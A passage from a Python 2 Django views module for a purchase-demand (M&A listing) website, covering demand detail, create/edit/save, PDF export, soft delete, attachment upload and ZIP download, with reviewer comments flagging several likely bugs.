    c['process'] = Demand.PROCESS
    c['d'] = m
    _visitors = DemandVisitor.objects.filter(demand_id=demand.id).order_by("-add_time")[0:8]
    visitors=[]
    # NOTE(review): order_by("project__update") -- similar queries elsewhere
    # in this file order by 'update_time'; confirm this field name exists
    # on Project, otherwise this line raises FieldError.
    c['recommendList'] = RecommondProjectItem.objects.filter(demand=demand, project__status=StatusProject.approved).order_by("project__update")[0:5]
    # Hide internal staff visits (newchama.com accounts) from the owner.
    for v in _visitors:
        if v.member.email.find('@newchama.com')==-1:
            visitors.append(v)
    c['visitors'] = visitors
    c['visitors_count'] = len(visitors)
    followers = Favorites.objects.filter(demand_id=demand.id).order_by("-add_time")
    c['followers'] = followers
    message_list = Message.objects.filter(demand_id=demand.id).order_by("-add_time")
    c['message_list'] = message_list
    if len(demand.company_industries.all()) > 0:
        # TODO: replace with cv1 later (walk up to the level-1 industry).
        if demand.company_industries.all()[0].level == 3:
            c['deal_list_more_id'] = demand.company_industries.all()[0].father.father.id
        elif demand.company_industries.all()[0].level == 2:
            c['deal_list_more_id'] = demand.company_industries.all()[0].father.id
        else:
            c['deal_list_more_id'] = demand.company_industries.all()[0].id
        c['deal_list'] = Deal.objects.filter(cv1=c['deal_list_more_id']).order_by('-update_time')[0:10]
        # Comparable listed companies per market; CN sorted by P/S, the
        # others by P/E.
        c['compare_cn'] = CompanyWithPE.objects.filter(country__name_en='China', industry__id=c['deal_list_more_id']).order_by('-ps')[0:5]
        c['compare_usa'] = CompanyWithPE.objects.filter(country__name_en='United States of America', industry__id=c['deal_list_more_id']).order_by('-pe')[0:5]
        c['compare_hk'] = CompanyWithPE.objects.filter(country__name_en='Hong Kong', industry__id=c['deal_list_more_id']).order_by('-pe')[0:5]
        c['compare_uk'] = CompanyWithPE.objects.filter(country__name_en='United Kingdom', industry__id=c['deal_list_more_id']).order_by('-pe')[0:5]
    return render_to_response("purchase/"+request.lang+"/mydetail.html", c, context_instance=RequestContext(request))
def ajax_more(request):
    """AJAX 'load more' endpoint behind the demand list page (see new()).

    Builds the same ConditionDemand from GET parameters and renders one
    page of results.

    NOTE(review): unlike the other views this one is not decorated with
    @member_login_required and instead returns None (not an HttpResponse)
    when there is no member in the session -- an anonymous hit therefore
    raises a server error. Confirm whether that is relied upon before
    changing it.
    """
    c = {}
    member = request.session.get('member', None)
    if member is None:
        return None
    member_id = request.session['member']['id']
    page = request.GET.get('page', 1)
    pagesize = request.GET.get('pagesize', 10)
    type = request.GET.get('type', 0)
    keyword = request.GET.get('keywords', '')
    country_id = request.GET.get('country_id', 0)
    province_id = request.GET.get('province_id', 0)
    industry_id = request.GET.get('industry_id', 0)
    sort = request.GET.get('sort', 'time_desc')
    condition = ConditionDemand()
    condition.country_id = country_id
    condition.keyword = keyword
    condition.status = StatusDemand.approved
    condition.province_id = province_id
    condition.type = type
    level = 1  # NOTE(review): assigned but never used after this point
    if industry_id != "" and industry_id != "0" and industry_id != 0:
        condition.industry = Industry.objects.get(pk=industry_id)
        level = condition.industry.level
    data, total = find_demands(condition, page, pagesize, sort)
    c['demands'] = data
    # A full page back implies there may be more rows to fetch.
    c["have_more_data"] = len(data) == int(pagesize)
    c['favorites_demand_ids'] = Helper.find_member_favorite_demand_ids(member_id)
    return render_to_response("purchase/"+request.lang+"/ajax_list.html", c, context_instance=RequestContext(request))
@member_login_required
@csrf_protect
def add(request):
    """Render the empty 'add purchase (demand)' form.

    Actual persistence happens through the save() AJAX endpoint; the
    commented-out POST branch below is the retired synchronous submit
    path.
    """
    c = {}
    c.update(csrf(request))
    c['title'] = _("Add Purchase")
    c['member'] = request.session.get('member', None)
    u = Demand()
    u.valid_day = 60  # default validity window (days) pre-filled in the form
    # if request.method == "POST":
    # u = Demand()
    # name_en = request.POST["name_en"]
    # name_cn = request.POST["name_cn"]
    # if name_en == "" and name_cn == "":
    # isvalid = False
    # messages.warning(request, _("please input demand name"))
    # submitStatus = request.POST["submitStatus"]
    # redirect_url = "purchase.mylist_pending"
    # if submitStatus == "draft":
    # u.status = StatusDemand.draft
    # redirect_url = "purchase.mylist_draft"
    # else:
    # u.status = StatusDemand.pending
    # _bind_data(request, u)
    # if isvalid:
    # try:
    # u.financial_year = datetime.datetime.today().year
    # u.save()
    # _save_items(request, u)
    # return redirect(redirect_url)
    # except Exception, e:
    # messages.warning(request, e.message)
    # logging.error(e.message)
    c['target_companies_count'] = 0
    c["u"] = u
    c['readSuitorRelate'] = False
    _load_types(c)
    return render_to_response("purchase/"+request.lang+"/add.html", c, context_instance=RequestContext(request))
@member_login_required
@csrf_protect
def edit(request, id):
    """Render the edit form for one of the member's own demands.

    Reuses the add.html template; pre-selects the stored country,
    province and industry, loads attachments / other target companies,
    and joins the language-specific keywords into a comma-separated
    string. Writes an edit-log entry.
    """
    c = {}
    c.update(csrf(request))
    c['title'] = _("Edit Purchase")
    c['member'] = request.session.get('member', None)
    member_id = c['member']['id']
    isvalid = True  # NOTE(review): never read -- leftover from a removed validation path
    u = get_object_or_404(Demand, pk=id, member_id=member_id)
    c['attachments'] = u.demand_attach.all()
    c['u'] = u
    c["other_target_companies"] = DemandOtherTargetCompany.objects.filter(demand__id=u.id)
    countrySelected = u.company_countries.all()
    if countrySelected:
        c['company_country'] = countrySelected[0]
    provinceSelected = u.company_provinces.all()
    if provinceSelected:
        c['company_province'] = provinceSelected[0]
    industrySelected = u.demand_industries.all()
    if industrySelected:
        c['company_industry'] = industrySelected[0]
    c['target_companies_count'] = u.target_companies.all().count()
    c['readSuitorRelate'] = True
    # Keywords are stored per language; pick the set matching the UI language.
    if request.lang == "en-us":
        mks = u.demand_keyword_en.all()
    else:
        mks = u.demand_keyword.all()
    c['mks'] = mks
    keywords = ""
    if len(mks) > 0:
        for m in mks:
            keywords += m.keyword + ","
        keywords = keywords[0 : len(keywords) - 1]  # drop trailing comma
    c['keywords'] = keywords
    _load_types(c)
    member = get_object_or_404(Member,id=member_id)
    write_demand_edit_log(request,member,u)
    return render_to_response("purchase/"+request.lang+"/add.html", c, context_instance=RequestContext(request))
@member_login_required
def detail(request, id):
    """Public detail page for a demand.

    Access rules: agent accounts are blocked; non-approved demands are
    visible only to their owner; 'suitor' (privately targeted) demands
    are visible only to pushed members and the owner. A view event is
    recorded unless the page is opened in preview mode (``type=1``).
    """
    c = {}
    c['title'] = _("Purchase Detail")
    member = request.session.get('member', None)
    c['member'] = member
    member_id = request.session['member']['id']
    if Helper.hasAgentRole(member['company_type']):
        messages.warning(request, _("You have no permission to visit this page"))
        return render_to_response("services/error_message.html", c, context_instance=RequestContext(request))
    demand = get_object_or_404(Demand, pk=id)
    if demand.status != StatusDemand.approved and demand.member_id != member_id:
        raise Http404
    if demand.is_suitor:
        if demand.is_push_to_member(member) is False and demand.member_id != member_id:
            messages.warning(request, _("not target"))
            return render_to_response("services/error_message.html", c, context_instance=RequestContext(request))
            # return HttpResponse(_("not target"))
    c['d'] = demand
    #c['last_year'] = demand.financial_year-1
    #demands_other = Demand.objects.filter(member_id=demand.member_id, status=StatusDemand.approved, is_anonymous=False).exclude(id=id)[0:5]
    #c['demands_other'] = demands_other
    #demands_recommend = Demand.objects.filter(service_type=demand.service_type, status=StatusDemand.approved).exclude(id=id).order_by("-pv")[0:5]
    #c['demands_recommend'] = demands_recommend
    c['message_list'] = Message.objects.filter(type_relation=2, demand=demand, is_delete=0).order_by('-add_time')
    if demand.member_id == member_id:
        c['is_own'] = True
    # Rebinds 'member' from the session dict to the model instance.
    member = Member.objects.get(id=member_id)
    member.view_demand(demand)
    # Keywords are stored per language; pick the set matching the UI language.
    if request.lang == "en-us":
        mks = demand.demand_keyword_en.all()
    else:
        mks = demand.demand_keyword.all()
    keywords = ""
    if len(mks) > 0:
        for m in mks:
            keywords += m.keyword + ","
        keywords = keywords[0 : len(keywords) - 1]  # drop trailing comma
    c['keywords'] = keywords
    c['is_added_favorite'] = member.is_added_demand_to_favorites(demand)
    c['is_expired']=datetime.date.today() > demand.expire_date
    url = "/detail.html"
    type = request.GET.get("type", "")
    c['type'] = type
    if type == "1":
        url = "/view.html"  # preview mode: no view-log entry is written
    else:
        write_demand_view_log(request,member,demand, type)
    return render_to_response("purchase/"+request.lang+ url, c, context_instance=RequestContext(request))
@member_login_required
def pdf(request, id):
    """Render a demand's teaser as a PDF via xhtml2pdf (pisa) and stream it.

    Applies the same visibility rules as detail(); records a 'printed'
    event on the member and a teaser-view log entry.
    """
    # HACK: forces the process-wide default encoding to UTF-8 so pisa can
    # handle non-ASCII template output under Python 2. This mutates global
    # interpreter state and affects every thread -- known anti-pattern,
    # kept as-is to avoid changing behaviour.
    reload(sys)
    sys.setdefaultencoding('utf8')
    c = {}
    c['title'] = _("Purchase Detail")
    c['member'] = request.session.get('member', None)
    member_id = request.session['member']['id']
    demand = get_object_or_404(Demand, pk=id)
    member = Member.objects.get(pk=member_id)
    if demand.status != StatusDemand.approved and demand.member_id != member_id:
        raise Http404
    if demand.is_suitor:
        if demand.is_push_to_member(member) is False and demand.member_id != member_id:
            return HttpResponse(_("not target"))
    c['d'] = demand
    c['last_year'] = demand.financial_year-1
    c['static_root'] = settings.STATICFILES_DIRS[0]
    template = get_template("purchase/"+request.lang+"/detail_pdf.html")
    html = template.render(Context(c))
    #print(html)
    file = StringIO.StringIO()  # NOTE: shadows the Python 2 builtin 'file'
    #file = open(os.path.join(settings.MEDIA_ROOT, 'test.pdf'), "w+b")
    pisaStatus = pisa.CreatePDF(html, dest=file)
    # Return PDF document through a Django HTTP response
    file.seek(0)
    pdf = file.read()
    file.close() # Don't forget to close the file handle
    member.print_demand(demand)
    write_demand_teaser_view_log(request,member,demand)
    return HttpResponse(pdf, mimetype='application/pdf')
@member_login_required
def save(request):
    """Create or update a Demand from the submitted form (AJAX endpoint).

    Returns a JSON object (served as text/plain) with:
      result  -- 'success' or 'failed'
      message -- error code ('symbolNotExsit', 'demandExsit', ...) or a
                 human-readable message
      id      -- the saved demand's pk on success

    Validation steps: name present, stock symbol exists for listed
    companies, no duplicate demand name for the same member. Field binding
    itself is delegated to _bind_data().
    """
    response_data = {}
    response_data['result'] = 'failed'
    if request.method == "POST":
        try:
            name_en = request.POST["name_en"]
            name_cn = request.POST["name_cn"]
            if name_en == "" and name_cn == "":
                response_data['message'] = _("please input demand name")
            else:
                # Listed companies must reference a known stock symbol.
                company_stock_symbol = request.POST.get("company_stock_symbol", False)
                is_list_company = int(request.POST.get("is_list_company", 0))
                if company_stock_symbol and is_list_company == 1:
                    checksymbolExsit = ListedCompany.objects.filter(stock_symbol=company_stock_symbol)
                    if len(checksymbolExsit) == 0:
                        response_data['message'] = 'symbolNotExsit'
                        return HttpResponse(simplejson.dumps(response_data), content_type="text/plain")
                submitStatus = request.POST["submitStatus"]
                u = Demand()
                isExsit = False
                id_post = request.POST.get("id", False)
                # Duplicate check: same member, same CN or EN name,
                # excluding the record being edited.
                condition = Q(member_id=request.session["member"]["id"])
                condition2 = Q()
                if id_post:
                    condition = condition & ~Q(pk=id_post)
                if name_cn.strip() != "":
                    condition2 = condition2 | Q(name_cn=name_cn.strip())
                if name_en.strip() != "":
                    condition2 = condition2 | Q(name_en=name_en.strip())
                project = Demand.objects.filter(condition & condition2)
                if project:
                    isExsit = True
                    response_data['message'] = "demandExsit"
                if isExsit is False:
                    if id_post:
                        u = Demand.objects.get(pk=id_post)
                    if u.status != StatusDemand.approved: #Terry mark, when the project is approved then do not reset the pending status
                        if submitStatus == "draft":
                            u.status = StatusDemand.draft
                        else:
                            u.status = StatusDemand.pending
                    bool, msg = _bind_data(request, u)
                    if bool:
                        response_data['result'] = 'success'
                        response_data['id'] = u.id
                        response_data['message'] = '操作成功'
                    else:
                        response_data['message'] = msg
        except Exception, e:
            logger.error(e.message)
            response_data['message'] = e.message
    return HttpResponse(simplejson.dumps(response_data), content_type="text/plain")
def _load_types(c):
    """Populate template context *c* with the static choice lists and
    reference data needed by the demand create/edit forms."""
    c["current_year"] = datetime.datetime.today().year
    c["last_year"] = datetime.datetime.today().year-1
    # Static choice tuples declared on the Demand model.
    for choice_name in ("FINANCIAL_TYPES", "FINANCIAL_TYPES_2",
                        "STOCK_STRUCTURE_PERCENTAGE_TYPES", "CURRENCY_TYPES",
                        "EMPLOYEES_COUNT_TYPES", "SERVICE_TYPES",
                        "SERVICE_TYPES_2"):
        c[choice_name] = getattr(Demand, choice_name)
    # Reference data pulled from the database / helpers.
    c["countries"] = Helper.find_countries()
    c["industries"] = Helper.find_industries_level1()
    c["members"] = Member.objects.all()
    # NOTE(review): company id 27 looks like a hard-coded exclusion -- confirm why.
    c["companies"] = Company.objects.all().exclude(id=27)
def _bind_data(request, u):
    """Populate demand *u* from the submitted form in *request* and save it.

    Validates uploaded attachments (size/extension), copies scalar form
    fields onto *u*, rebuilds the attachment / country / province /
    industry / keyword relations, and stores a profile-completeness
    percentage ("integrity") per language.

    Returns:
        (True, "ok") on success, or (False, <code>) where <code> is
        "tooBig" or "typeError" for a rejected attachment.
    """
    has_attach = False
    upload_types = request.POST.getlist("upload_types", [])
    # --- attachment pre-validation: size <= 20MB, office/pdf types only ---
    for ut in upload_types:
        uf = request.FILES.get("upload_file_" + ut, False)
        if uf:
            file_ext = os.path.splitext(uf.name)[1].lower()
            if uf.size > 20000000:
                return False, "tooBig"
            #return _("The file cannot be more than 20M")
            if file_ext != ".doc" and file_ext != ".docx" and file_ext != ".pdf" and file_ext != ".ppt" and file_ext != ".pptx":
                return False, "typeError"
            #return _("The file must be 'doc|docx|pdf'")
            has_attach = True
    # Each filled field group bumps 'integrity'; it is normalised to a
    # percentage at the end (denominator 21 -- presumably the number of
    # tracked groups; TODO confirm it stays in sync when fields change).
    integrity = 0
    u.name_cn = request.POST.get("name_cn", None)
    u.name_en = request.POST.get("name_en", None)
    if request.POST.get("name_cn", False) or request.POST.get("name_en", False):
        integrity = integrity + 1
    if request.POST.get("service_type", False):
        u.service_type = request.POST["service_type"]
        integrity = integrity + 1
    # Numeric text inputs arrive with thousands separators; strip the commas.
    pay_currency = request.POST.get("pay_currency", False)
    if pay_currency and pay_currency != "":
        u.pay_currency = pay_currency.replace(",", "")
        integrity = integrity + 1
    u.is_list_company = int(request.POST.get("is_list_company", 0))
    integrity = integrity + 1
    project_relation = request.POST.get("project_relation", False)
    if project_relation and project_relation != "":
        u.project_relation = project_relation.replace(",", "")
        integrity = integrity + 1
    valid_day = int(request.POST.get("valid_day", 0))
    u.valid_day = valid_day
    u.expire_date = datetime.datetime.today() + datetime.timedelta(days=int(valid_day))
    integrity = integrity + 1
    u.is_anonymous = int(request.POST.get("is_anonymous", "0"))
    integrity = integrity + 1
    exist_upload_names = request.POST.getlist("exist_upload_names", [])
    if has_attach or exist_upload_names:
        integrity = integrity + 1
        u.has_attach = True
    else:
        u.has_attach = False
    #country
    #industry
    #project_keyword
    u.employees_count_type = request.POST.get("employees_count_type", None)
    if request.POST.get("employees_count_type", False):
        integrity = integrity + 1
    if request.POST.get("stock_structure_percentage_type_institutional", False):
        u.stock_structure_percentage_type_institutional = request.POST["stock_structure_percentage_type_institutional"]
    if request.POST.get("stock_structure_percentage_type_management", False):
        u.stock_structure_percentage_type_management = request.POST["stock_structure_percentage_type_management"]
    if request.POST.get("stock_structure_percentage_type_private", False):
        u.stock_structure_percentage_type_private = request.POST["stock_structure_percentage_type_private"]
    # NOTE(review): the condition below checks "..._institutional" twice;
    # the second term was presumably meant to be "..._management" -- confirm.
    if request.POST.get("stock_structure_percentage_type_institutional", False) or request.POST.get("stock_structure_percentage_type_institutional", False) or request.POST.get("stock_structure_percentage_type_private", False):
        integrity = integrity + 1
    u.currency_type_financial = request.POST.get("currency_type", None)
    integrity = integrity + 1
    expected_enterprice_value_enter = request.POST.get("expected_enterprice_value_enter", False)
    if expected_enterprice_value_enter and expected_enterprice_value_enter != "":
        u.expected_enterprice_value_enter = expected_enterprice_value_enter.replace(",", "")
        integrity = integrity + 1
    #new column
    stock_percent = request.POST.get("stock_percent", False)
    if stock_percent and stock_percent != "":
        u.stock_percent = stock_percent
        integrity = integrity + 1
    deal_size_enter = request.POST.get("deal_size_enter", False)
    if deal_size_enter and deal_size_enter != "":
        u.deal_size_enter = deal_size_enter.replace(",", "")
        integrity = integrity + 1
    income_last_phase_enter = request.POST.get("income_last_phase_enter", False)
    if income_last_phase_enter and income_last_phase_enter != "":
        u.income_last_phase_enter = income_last_phase_enter.replace(",", "")
        integrity = integrity + 1
    profit_last_phase_enter = request.POST.get("profit_last_phase_enter", False)
    if profit_last_phase_enter and profit_last_phase_enter != "":
        u.profit_last_phase_enter = profit_last_phase_enter.replace(",", "")
        integrity = integrity + 1
    ebitda = request.POST.get("ebitda", False)
    if ebitda and ebitda != "":
        u.ebitda = ebitda.replace(",", "")
        integrity = integrity + 1
    u.audit_status = int(request.POST.get("audit_status", 0))
    integrity = integrity + 1
    u.process = request.POST.get("process", 0)
    '''
    no input start
    '''
    member_id = request.session["member"]["id"]
    if member_id != "0" and member_id != "":
        u.member = Member.objects.get(pk=member_id)
    u.business_cn = request.POST.get("business_cn", None)
    u.business_en = request.POST.get("business_en", None)
    # if request.POST.get("business_cn", False) or request.POST.get("business_en", False):
    #     integrity = integrity + 1
    u.company_stock_symbol = request.POST.get("company_stock_symbol", None)
    #u.company_symbol = request.POST["company_symbol"]
    # financial_is_must_audit: 1 => audited by default, 2 => not audited.
    financial_is_must_audit = int(request.POST.get("financial_is_must_audit", 0))
    u.financial_is_must_audit = financial_is_must_audit
    if financial_is_must_audit == 1:
        u.financial_audit_company_is_must_default = True
    elif financial_is_must_audit == 2:
        u.financial_audit_company_is_must_default = False
    # if request.POST["growth_three_year"] != "":
    #     u.growth_three_year = request.POST["growth_three_year"]
    #     integrity = integrity + 1
    deal_size = request.POST.get("deal_size", False)
    if deal_size and deal_size != "":
        u.deal_size = deal_size
    # integrity = integrity + 1
    if request.POST.get("income", False):
        u.income = request.POST["income"]
    if request.POST.get("income_last_phase", False):
        u.income_last_phase = request.POST["income_last_phase"]
    # integrity = integrity + 1
    u.intro_cn = request.POST.get("intro_cn", None)
    u.intro_en = request.POST.get("intro_en", None)
    # if request.POST.get("intro_cn", False) or request.POST.get("intro_en", False):
    #     integrity = integrity + 1
    u.is_suitor = int(request.POST.get("is_suitor", "0"))
    # u.net_assets = request.POST["net_assets"]
    if request.POST.get("profit", False):
        u.profit = request.POST["profit"]
    if request.POST.get("profit_last_phase", False):
        u.profit_last_phase = request.POST["profit_last_phase"]
    if request.POST.get("registered_capital", False):
        u.registered_capital = request.POST["registered_capital"]
    total_assets_last_phase = request.POST.get("total_assets_last_phase", False)
    if total_assets_last_phase and total_assets_last_phase != "":
        u.total_assets_last_phase = total_assets_last_phase.replace(",", "")
    # u.remark_cn = request.POST["remark_cn"]
    # u.remark_en = request.POST["remark_en"]
    # u.financial_audit_company_name = request.POST["financial_audit_company_name"]
    if request.POST.get("expected_enterprice_value", False):
        u.expected_enterprice_value = request.POST["expected_enterprice_value"]
    # integrity = integrity + 1
    name_project_cn = request.POST.get("name_project_cn", False)
    if name_project_cn:
        u.name_project_cn = name_project_cn
    else:
        u.name_project_cn = ""
    name_project_en = request.POST.get("name_project_en", False)
    if name_project_en:
        u.name_project_en = name_project_en
    else:
        u.name_project_en = ""
    # if request.POST.get("name_project_cn", False) or request.POST.get("name_project_en", False):
    #     integrity = integrity + 1
    project_stage = request.POST.get("project_stage", False)
    if project_stage and project_stage != "":
        u.project_stage = project_stage.replace(",", "")
    pay_way = request.POST.get("pay_way", False)
    if pay_way and pay_way != "":
        u.pay_way = pay_way.replace(",", "")
    income_enter = request.POST.get("income_enter", False)
    if income_enter and income_enter != "":
        u.income_enter = income_enter.replace(",", "")
    profit_enter = request.POST.get("profit_enter", False)
    if profit_enter and profit_enter != "":
        u.profit_enter = profit_enter.replace(",", "")
    # if request.POST.get("income", False) or request.POST.get("income_enter", False):
    #     integrity = integrity + 1
    #
    # if request.POST.get("profit", False) or request.POST.get("profit_enter", False):
    #     integrity = integrity + 1
    total_assets = request.POST.get("total_assets", False)
    if total_assets and total_assets != "":
        u.total_assets = total_assets.replace(",", "")
    # integrity = integrity + 1
    total_profit = request.POST.get("total_profit", False)
    if total_profit and total_profit != "":
        u.total_profit = total_profit.replace(",", "")
    # integrity = integrity + 1
    '''
    no input end
    '''
    #new column end
    # Persist scalar fields before rebuilding the related objects below.
    u.save()
    # --- attachments: replace all rows, reusing previously uploaded files
    # (exist_upload_*) when no new file was posted for a given type ---
    u.demand_attach.all().delete()
    exist_upload_names = request.POST.getlist("exist_upload_names", [])
    exist_upload_newNames = request.POST.getlist("exist_upload_newNames", [])
    upload_type_names = request.POST.getlist("upload_type_names", [])
    upload_types = request.POST.getlist("upload_types", [])
    for ut, tn in zip(upload_types, upload_type_names):
        uf = request.FILES.get("upload_file_" + ut, False)
        if uf:
            # if uf.size > 2000000:
            #     messages.error(request, _("The file cannot be more than 2M"))
            #     return
            da = DemandAttach()
            da.demand = u
            da.file_name = uf.name
            da.file_type = ut
            da.file_type_name = tn
            da.new_name = _upload_project_file(uf)
            da.save()
        else:
            for t, f, n in zip(upload_types, exist_upload_names, exist_upload_newNames): #if upload not exsit, check the file that has already exsit file
                if t == ut:
                    da = DemandAttach()
                    da.demand = u
                    da.file_name = f
                    da.file_type = ut
                    da.file_type_name = tn
                    da.new_name = n
                    da.save()
                    break
    # --- geographic scope ---
    countries_ids = request.POST.getlist("country", [])
    if countries_ids is not None:
        integrity = integrity + 1
        for id in countries_ids:
            if id != "0" and id != "":
                # NOTE(review): reassigns the whole id list on every loop
                # iteration; probably intended to run once -- confirm.
                u.company_countries = countries_ids
    provinces_ids = request.POST.getlist("province", [])
    if provinces_ids is not None:
        for id in provinces_ids:
            if id != "0" and id != "":
                c = Province.objects.get(pk=id)
                u.company_provinces.add(c)
    targetCompanies = request.POST.getlist("target_companies", [])
    if targetCompanies:
        u.target_companies = request.POST.getlist("target_companies", [])
    # --- industries: rebuild both the M2M and the denormalised
    # DemandIndustry rows (cv1/cv2/cv3 = level-1/2/3 ancestor ids) ---
    # industries_ids = request.POST.getlist("industry", [])
    industries_ids = request.POST.getlist("industry_id", [])
    u.company_industries.clear()
    DemandIndustry.objects.filter(demand_id=u.id).delete();
    if industries_ids is not None:
        integrity = integrity + 1
        for id in industries_ids:
            if id != "0" and id != "":
                c = Industry.objects.get(pk=id)
                u.company_industries.add(c)
                di = DemandIndustry()
                di.demand = u
                if c.level == 3:
                    di.cv3 = c.id
                    di.cv2 = c.father_id
                    di.cv1 = c.father.father_id
                elif c.level == 2:
                    di.cv2 = c.id
                    di.cv1 = c.father_id
                else:
                    di.cv1 = c.id
                di.save()
    # --- keywords: stored per language (CN vs EN tables) ---
    demand_keyword = request.POST.get("project_keyword", False)
    if request.lang == "en-us":
        u.demand_keyword_en.all().delete()
    else:
        u.demand_keyword.all().delete()
    if demand_keyword:
        integrity = integrity + 1
        mks = demand_keyword.split(",")
        for m in mks:
            if request.lang == "en-us":
                k = DemandKeywordEn()
            else:
                k = DemandKeyword()
            k.keyword = m
            k.demand = u
            k.save()
    # Convert the field-group count into a percentage (21 tracked groups).
    integrity = int(integrity * 100 / 21)
    if request.lang == "zh-cn":
        u.integrity = integrity
    else:
        u.integrity_en = integrity
    u.save()
    return True, "ok"
def _clear_items(u):
    """Detach every many-to-many relation from demand *u* (rows themselves
    are not deleted, only the links)."""
    for relation in (u.company_countries, u.company_industries,
                     u.company_provinces, u.target_members,
                     u.target_companies, u.target_industries):
        relation.clear()
@csrf_exempt
def delete(request):
    """Soft-delete a demand owned by the logged-in member (AJAX endpoint).

    Responds with a plain-text status: "success", "nologon" when no member
    session exists, or the exception message on failure. The record is kept
    and only its status is flipped to StatusDemand.deleted.
    """
    msg = ""
    if request.method == 'POST':
        id = request.POST["id"]
        member = request.session.get('member', None)
        member_id = request.session['member']['id']
        if member is None:
            msg = "nologon"
        else:
            try:
                member=get_object_or_404(Member,id=member_id)
                # Filtering by member_id ensures only the owner can delete.
                d=Demand.objects.get(pk=id, member_id=member_id)
                d.status=StatusDemand.deleted
                d.save()
                # terry 20150204 remark
                write_demand_delete_log(request, member, d)
                msg = "success"
            except Exception, e:
                msg = e.message
    return HttpResponse(msg)
@csrf_exempt
def offline(request):
    """Take a demand owned by the logged-in member offline (AJAX endpoint).

    Mirrors delete() but sets StatusDemand.offline instead; responds with
    "success", "nologon", or the exception message as plain text.
    """
    msg = ""
    if request.method == 'POST':
        id = request.POST["id"]
        member = request.session.get('member', None)
        member_id = request.session['member']['id']
        if member is None:
            msg = "nologon"
        else:
            try:
                member=get_object_or_404(Member,id=member_id)
                # Only the owner's demand can be taken offline.
                d=Demand.objects.get(pk=id, member_id=member_id)
                d.status=StatusDemand.offline
                d.save()
                write_demand_offline_log(request, member, d)
                msg = "success"
            except Exception, e:
                msg = e.message
    return HttpResponse(msg)
@csrf_exempt
@member_login_required
def get_list_for_home(request):
    """Return the 10 newest approved demands matching an industry or
    location filter, rendered with the home-page list partial.

    Query params: type ("industry" or location-based), id (the industry /
    country / province / city pk), location ("city" | "province" | other).
    Demands with no industry/location restriction always match (the
    `...=None` terms).
    """
    c = {}
    if request.method == 'GET':
        try:
            type = request.GET.get("type", "")
            id = request.GET.get("id", "")
            q1 = Q(status=StatusDemand.approved)
            if type == "industry":
                q2 = Q(company_industries=None) | Q(company_industries=id)
            else:
                q2 = Q(company_countries=None, company_provinces=None, company_cities=None)
                location = request.GET.get("location", "")
                if location == "city":
                    q2 = q2 | Q(company_cities=id)
                elif location == "province":
                    q2 = q2 | Q(company_provinces=id)
                else:
                    q2 = q2 | Q(company_countries=id)
            # len(q2) counts the Q node's children (non-empty filter).
            if len(q2) > 0:
                q1 = q1 & q2
            demands = Demand.objects.filter(q1).order_by("-id")[0:10]
            c['data'] = demands
        except Exception, e:
            logger.error(e.message)
    return render_to_response("purchase/"+request.lang+"/list_for_home.html", c, context_instance=RequestContext(request))
@member_login_required
def download_attach(request, id):
    """Stream all attachments of a demand as a single in-memory ZIP.

    Access rules match the detail/pdf views. Files live on disk as
    MEDIA_ROOT/demand/<new_name> but are presented inside the archive under
    their original upload names, in a folder named after the demand.
    """
    # Python-2-only encoding hack (see pdf()).
    reload(sys)
    sys.setdefaultencoding('utf8')
    demand = get_object_or_404(Demand, pk=id)
    member_id = request.session['member']['id']
    member = Member.objects.get(pk=member_id)
    if demand.status != StatusDemand.approved and demand.member_id != member_id:
        raise Http404
    if demand.demand_attach.count() == 0:
        return HttpResponse(_("no attach"))
    if demand.is_suitor:
        if demand.is_push_to_member(member) is False and demand.member_id != member_id:
            return HttpResponse(_("not target"))
    path = settings.MEDIA_ROOT + "/demand/"
    #please view: http://stackoverflow.com/questions/12881294/django-create-a-zip-of-multiple-files-and-make-it-downloadable
    # Each entry encodes "<dir>/<stored random name>/<original name>" so a
    # single os.path.split() below recovers both the on-disk path and the
    # display name.
    filenames = []
    for attach in demand.demand_attach.all():
        filenames.append(path+attach.new_name+"/"+attach.file_name)
    # Folder name in ZIP archive which contains the above files
    # E.g [thearchive.zip]/somefiles/file2.txt
    zip_subdir = demand.name_cn
    if request.lang == "en-us":
        zip_subdir = demand.name_en
    zip_filename = "%s.zip" % zip_subdir
    # Open StringIO to grab in-memory ZIP contents
    s = StringIO.StringIO()
    # The zip compressor
    zf = zipfile.ZipFile(s, "w")
    for fpath in filenames:
        # fnewname = MEDIA_ROOT/demand/<new_name> (the real file on disk),
        # fname = the original upload name shown inside the archive.
        fnewname, fname = os.path.split(fpath)
        # NOTE(review): 'break' aborts the whole archive on the first
        # missing file; 'continue' may have been intended -- confirm.
        if os.path.isfile(fnewname) is False:
            break
        zip_path = os.path.join(zip_subdir, fname)
        # Add file, at correct path
        zf.write(fnewname, zip_path)
    # Must close zip for all contents to be written
    zf.close()
    # Grab ZIP file from in-memory, make response with correct MIME-type
    resp = HttpResponse(s.getvalue(), content_type="application/x-zip-compressed")
    # ..and correct content-disposition
    resp['Content-Disposition'] = 'attachment; filename=%s' % zip_filename.encode("utf8")
    member.download_demand_attach(demand)
    return resp
def _upload_project_file(f):
    """Persist an uploaded file under MEDIA_ROOT/demand/ with a random name.

    Args:
        f: a Django UploadedFile (needs ``.name`` and ``.chunks()``).

    Returns:
        The generated file name ("<8 digits><original extension>"), or ""
        when the write failed.
    """
    file_name = ""
    path = settings.MEDIA_ROOT + "/demand/"
    try:
        if not os.path.exists(path):
            os.makedirs(path)
        file_ext = os.path.splitext(f.name)[1]
        # Zero-padded random 8-digit name avoids collisions with original names.
        random_no = str(random.randint(0, 99999999)).zfill(8)
        file_name = random_no + file_ext
        # 'with' guarantees the handle is closed even if a chunk write fails
        # (the original leaked the handle on error).
        with open(path + file_name, 'wb+') as destination:
            for chunk in f.chunks():
                destination.write(chunk)
    except Exception as e:
        logger.error(e.message)
        # Do not report a name for a file that was never fully written.
        file_name = ""
    return file_name
def find_demands(condition, page, pagesize, sort):
    """Query demands by a search-condition object, with paging and sorting.

    Args:
        condition: object with keyword/type/country_id/province_id/industry/
            member_id/status attributes; "empty" sentinels ("", "0", 0, None,
            -1) disable the corresponding filter.
        page, pagesize: 1-based page number and page size (clamped to >= 1).
        sort: "time_desc" (default) | "time_asc" | "size_desc" | "size_asc"
            | "hot_desc" (by page views).

    Returns:
        (queryset slice of matching demands, total match count).
    """
    demands = Demand.objects.all()
    if condition.keyword != "":
        demands = demands.filter(Q(name_cn__contains=condition.keyword) | Q(name_en__contains=condition.keyword))
    if condition.type != "" and condition.type != "0" and condition.type != 0:
        demands = demands.filter(service_type=condition.type)
    if condition.country_id != 0 and condition.country_id != "" and condition.country_id != "0":
        demands = demands.filter(Q(company_countries__id=condition.country_id)) #Q(company_countries=None) |
